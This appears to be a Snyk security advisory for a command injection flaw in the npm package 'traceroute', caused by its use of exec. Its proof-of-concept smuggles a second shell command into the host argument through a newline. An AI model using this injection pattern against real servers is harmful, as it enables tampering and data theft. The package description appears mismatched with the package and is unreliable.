Snyk has a published code exploit for this vulnerability.
The probability is the direct output of the EPSS model, and conveys an overall sense of the threat of exploitation in the wild. The percentile measures the EPSS probability relative to all known EPSS scores. Note: This data is updated daily, relying on the latest available EPSS model version. Check out the EPSS documentation for more details.
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsLearn about Shell Command Injection vulnerabilities in an interactive lesson.
Start learningThere currently is no fixed version for traceroute
. A fix is on the master branch but was not published to npm.
traceroute
is an npm package used for listing references in a remote git repository.
Affected versions of this package are vulnerable to Arbitrary Command Injection due to the insecure use of exec
. An attacker can add a newline %0a
after the host addr, and inject malicious shell commands to disrupt server operation or obtain sensitive information.
traceroute = require('traceroute');
host = '127.0.0.1\ntouch /tmp/malicious';
traceroute.trace(host, function (err,hops) { // the file /tmp/malicious was created console.log(hops); });